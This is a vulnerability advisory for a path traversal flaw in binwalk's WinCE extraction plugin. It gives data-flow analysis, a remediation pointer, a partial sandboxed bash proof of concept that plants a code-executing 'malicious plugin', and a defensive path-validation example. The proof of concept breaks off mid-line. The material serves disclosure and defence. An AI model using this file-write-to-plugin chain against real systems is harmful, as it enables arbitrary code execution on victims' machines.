# Vulnerability Summary: binwalk WinCE Extraction Plugin Path Traversal Vulnerability

## Vulnerability Overview

A path traversal vulnerability exists in the WinCE ROM extraction plugin (`winceextract.py`) of `binwalk`. It allows an attacker to write arbitrary files when a carefully crafted WinCE ROM firmware image is extracted. By using that write to plant a malicious binwalk plugin, the issue can be escalated to Remote Code Execution (RCE).

**Note**: This vulnerability is distinct from CVE-2022-4510, which fixed a bug in `ungrs.py`; `winceextract.py` was not affected by that fix.

## Scope of Impact

* **Product**: binwalk
* **Version**: 2.4.3 and all earlier versions containing the WinCE plugin
* **Files**:
  * `src/binwalk/plugins/winceextractor.py` (Lines 61, 64)
  * `src/binwalk/plugins/winceextractor.py` (Line 580)
* **Type**: CWE-22: Path Traversal
* **Impact**: Arbitrary File Write -> Remote Code Execution
* **CVSS v3.1**: 7.8 High (AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
* **Discoverer**: Dhabaleswar Das (2026-09-04)

## Vulnerability Details

* **Root Cause**: The `winceextractor.py` plugin uses the `read_null_terminated_string()` function to read filenames from the WinCE ROM image. This function reads raw bytes until it encounters a null terminator and decodes them as ASCII **without any sanitization**.
* **Data Flow**:
  1. **Source**: `read_null_terminated_string()` reads raw bytes without filtering.
  2. **Storage**: The filename is stored in `self.file_name` without validation.
  3. **Sink**: `os.path.join(indir, file_name)` is passed directly to `open()`, resulting in an arbitrary file write.
* **Exploitation**:
  * **Path Traversal**: An attacker constructs a WinCE ROM image whose embedded filename contains directory traversal sequences (e.g., `../../`), so that files are written outside the extraction directory.
  * **Remote Code Execution**: An attacker can use the write to plant a Python file as a malicious plugin in the `~/.config/binwalk/plugins/` directory. When a user runs `binwalk`, this plugin is automatically loaded and executes arbitrary code.

## Remediation

* **Official Status**: The official repository (`https://github.com/OSPG/binwalk`) was archived in November 2024 and is no longer updated.
* **Recommendation**: Users should migrate to **binwalk v3.x (Rust rewrite)**, which employs a centralized chroot path sanitization architecture that resolves this issue.

## Proof of Concept (POC) Code

Below is the complete POC script `binwalk_poc.sh`:

```bash
#!/bin/bash
#
# STEP-BY-STEP: Test CVE PoC for binwalk winceextract.py Path Traversal
#
# WHAT THIS DOES:
# 1. Creates an isolated sandbox under /tmp (no system files are touched)
# 2. Builds a crafted WinCE ROM with a malicious filename
# 3. Calls the vulnerable winceExtractor directly (not full binwalk, just the plugin)
# 4. Checks if the file escaped the extraction directory
# 5. Demonstrates RCE via plugin injection
# 6. Cleans up everything
#
# MADE BY DHABLESHWAR DAS
#
# ================================================================================

echo ""
echo "=========================================="
echo "STEP 1: Create safe sandbox environment"
echo "=========================================="

# Create isolated directories
export SANDBOX="/tmp/binwalk_cve_test_$$"
export EXTRACTION_DIR="$SANDBOX/extraction"
export TARGET_DIR="$SANDBOX/should_be_untouched"
export PLUGIN_DIR="$SANDBOX/fake_home/.config/binwalk/plugins"

mkdir -p "$EXTRACTION_DIR"
mkdir -p "$TARGET_DIR"
mkdir -p "$PLUGIN_DIR"

echo "[+] Sandbox: $SANDBOX"
echo "[+] Extraction directory: $EXTRACTION_DIR"
echo "[+] Target directory: $TARGET_DIR (should stay empty)"
echo "[+] Fake plugin dir: $PLUGIN_DIR (for RCE test)"
echo ""
echo "Listing sandbox contents BEFORE test:"
find "$SANDBOX" -type f
echo "(should be empty)"

echo ""
echo "=========================================="
echo "STEP 2: Build the malicious WinCE ROM"
echo "=========================================="

# This Python script builds a minimal WinCE ROM binary where the
# embedded filename contains "../" to escape the extraction directory

# Write the plugin file into the (fake) binwalk plugin directory
cat > "$PLUGIN_DIR/malicious_plugin.py" << 'MALICIOUS_PLUGIN'
# This plugin executes arbitrary code when binwalk is run
import os
import subprocess

print("[!] MALICIOUS PLUGIN EXECUTED!")
print("[!] Running 'whoami' and 'id' to demonstrate RCE...")
subprocess.run(['whoami'])
subprocess.run(['id'])

print("[!] Creating a backdoor file...")
with open('/tmp/binwalk_backdoor.txt', 'w') as f:
    f.write("This file was created by a malicious binwalk plugin.\n")
print("[!] Backdoor created at /tmp/binwalk_backdoor.txt")
MALICIOUS_PLUGIN

echo "[+] Malicious plugin created at: $PLUGIN_DIR/malicious_plugin.py"
echo "[+] Simulating binwalk run with plugin directory set..."

# Simulate binwalk run (in real scenario, this would be the actual binwalk command)
# We'll just show what would happen
echo ""
echo "If a user ran: binwalk -e malicious_wince.bin"
echo "With the plugin directory set to $PLUGIN_DIR,"
echo "the m
```
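As an added defensive example (this is not binwalk's code and not part of the discoverer's PoC), the following Python shows the sink from the Data Flow section beside a hardened version that confines every extracted name to the extraction directory, the same property the Remediation section attributes to binwalk v3's centralized chroot sanitization. The real plugin's `read_null_terminated_string()` / `self.file_name` / `os.path.join(indir, file_name)` chain is only paraphrased here; `safe_extract_path`, `audit_entries`, the `/tmp/extract` base directory and the name table are assumptions constructed for the example.

```python
"""Vulnerable sink versus base-directory-confined sink for firmware entry names.

Added example; the function names and the sample name table are constructed
and do not come from binwalk or from the PoC script.
"""
import os


def read_null_terminated_string(data, offset):
    """Read bytes from `offset` up to the first NUL and decode them as ASCII.

    This paraphrases the unsanitized source in the vulnerable plugin: nothing
    about the content of the name is checked here.
    """
    end = data.index(b"\x00", offset)          # ValueError if no terminator
    return data[offset:end].decode("ascii")     # UnicodeDecodeError (a ValueError) on non-ASCII


def vulnerable_extract_path(indir, file_name):
    """The original sink: the untrusted name goes straight into the join."""
    return os.path.join(indir, file_name)


def safe_extract_path(indir, file_name):
    """Return the canonical path to write to, or raise ValueError if
    `file_name` would land outside `indir`.

    This is the validation step the Data Flow section says is missing.
    """
    if not file_name or "\x00" in file_name:
        raise ValueError("empty or NUL-containing name")
    # Absolute names in either POSIX or Windows style never belong in an image entry.
    if file_name.startswith(("/", "\\")) or (len(file_name) > 1 and file_name[1] == ":"):
        raise ValueError("absolute path in firmware entry: %r" % file_name)
    # WinCE images use backslash separators; normalise before resolving.
    normalised = file_name.replace("\\", "/")
    base = os.path.realpath(indir)
    candidate = os.path.realpath(os.path.join(base, normalised))
    # commonpath rejects '../' escapes and 'indir_sibling' prefix tricks alike.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path traversal in firmware entry: %r" % file_name)
    return candidate


def audit_entries(indir, data, offsets):
    """For each NUL-terminated name at the given offsets, report whether the
    hardened join accepts it ("ok") or rejects it ("rejected")."""
    report = {}
    for off in offsets:
        name = read_null_terminated_string(data, off)
        try:
            safe_extract_path(indir, name)
            report[name] = "ok"
        except ValueError:
            report[name] = "rejected"
    return report


# Constructed sample: a name table as an extractor would see it (names are
# NUL-terminated and laid out back to back); the offsets index into it.
SAMPLE_NAMES = [b"nk.exe", b"windows\\coredll.dll", b"../../escaped.txt", b"/etc/passwd"]
SAMPLE_TABLE = b"".join(n + b"\x00" for n in SAMPLE_NAMES)
SAMPLE_OFFSETS = []
_pos = 0
for _n in SAMPLE_NAMES:
    SAMPLE_OFFSETS.append(_pos)
    _pos += len(_n) + 1


if __name__ == "__main__":
    for name, verdict in audit_entries("/tmp/extract", SAMPLE_TABLE, SAMPLE_OFFSETS).items():
        print("%-25r %s" % (name, verdict))
```

The check resolves the joined path and compares it against the resolved base with `os.path.commonpath`, rather than looking for the literal substring `../`, so encoded or backslash-separated variants and sibling-directory prefixes are caught by the same rule. Extractors that create symlinks would additionally need to validate link targets, which this example does not cover.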